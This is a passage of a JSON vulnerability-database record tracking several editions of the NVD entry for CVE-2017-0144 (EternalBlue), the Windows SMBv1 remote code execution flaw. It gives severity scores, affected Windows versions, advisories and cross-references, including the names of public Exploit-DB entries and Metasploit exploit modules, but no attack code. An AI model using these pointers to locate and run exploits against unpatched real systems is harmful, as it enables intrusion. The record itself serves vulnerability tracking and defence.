"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "id": "CVE-2017-0144", "lastseen": "2019-05-29T18:16:45", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0144", "type": "cve", "viewCount": 56}, "differentElements": ["references"], "edition": 1, "lastseen": "2019-05-29T18:16:45"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", 
"version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": 
"AND"}]}, "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"], "type": "rapid7blog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": 
"kaspersky"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 8.4, "vector": "NONE"}, "twitter": {"counter": 14, "modified": "2021-02-02T06:36:30", "tweets": [{"link": "https://twitter.com/sarah61289292/status/1362691554897494028", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660."}, {"link": "https://twitter.com/VulmonFeeds/status/1374009119766634500", "text": "CVE-2017-0144\n\nThe SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; ...\n\nhttps://t.co/foy373dLBH?amp=1"}, {"link": "https://twitter.com/AlqarniMazhood/status/1362380423721017347", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 
\u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0633\u0647_\u0643\u062f\u062f\u062f\u0627?src=hashtag_click"}, {"link": "https://twitter.com/kitty14956590/status/1384943024250228740", "text": "when the CVE-2017-0144 sus"}, {"link": "https://twitter.com/mohannad_1saad1/status/1362746840261816323", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0643\u0627\u0633_\u0627\u0644\u0633\u0639\u0648\u062f\u064a\u0629_\u0627\u0644\u0639\u0627\u0644\u0645\u064a_\u0644\u0644\u062e\u062e\u062e\u062e\u062e\u064a\u0644?src=hashtag_click"}, {"link": "https://twitter.com/AllahibiReem/status/1362691966404861952", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660."}, {"link": "https://twitter.com/omaryazeed665/status/1362621178637135873", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u064a\u0648\u0645_\u0627\u0644\u062c\u0645\u0639\u0647?src=hashtag_click"}, {"link": "https://twitter.com/bashayeralsallo/status/1362434722924818437", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0633\u0644\u0637\u0627\u0646?src=hashtag_click"}, {"link": "https://twitter.com/kitty14956590/status/1384942932843712514", "text": "when the CVE-2017-0144 sus"}, {"link": "https://twitter.com/Sid____/status/1382708880719933448", "text": "the most damaging one used by Russian govt. (and others) was CVE-2017-0144 commonly known as EternalBlue. 
We know why it will never make the \"list\"!"}]}}, "extraReferences": [{"name": "96704", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96704"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "42031", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/42031/"}, {"name": "42030", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/42030/"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "hash": 
"a063f5e53ce6418d86d1343c37907985df07702604c698ddd12f6f0822c8609c", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "3d33672b05b572e15dc2cac26ad54d7c", "key": "title"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "fb65e2b51285ba6bbdd4e82c86d7dbc3", "key": "extraReferences"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "8378623388dea1b8ea71bec9adacab2c", "key": "references"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "6fd95f86c673c4a8b4f1fd51b22d928f", "key": "href"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "e9f80c9b0a5d969452d09ddbf4c74a71", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "id": "CVE-2017-0144", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96704", 
"http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0144", "type": "cve", "viewCount": 301}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; 
Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-05T13:14:20", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": 
"avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-02-05T13:14:20", "rev": 2, "value": 8.4, "vector": "NONE"}}, "hash": "c005c86745705d48f8e7fca3f963c707f00265739ba6709ca4443c77261a7297", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "3d33672b05b572e15dc2cac26ad54d7c", "key": "title"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": 
"cwe"}, {"hash": "8378623388dea1b8ea71bec9adacab2c", "key": "references"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6fd95f86c673c4a8b4f1fd51b22d928f", "key": "href"}, {"hash": "e9f80c9b0a5d969452d09ddbf4c74a71", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "id": "CVE-2017-0144", "lastseen": "2020-02-05T13:14:20", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0144", "type": "cve", "viewCount": 231}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 3, 
"lastseen": "2020-02-05T13:14:20"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", 
"references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": 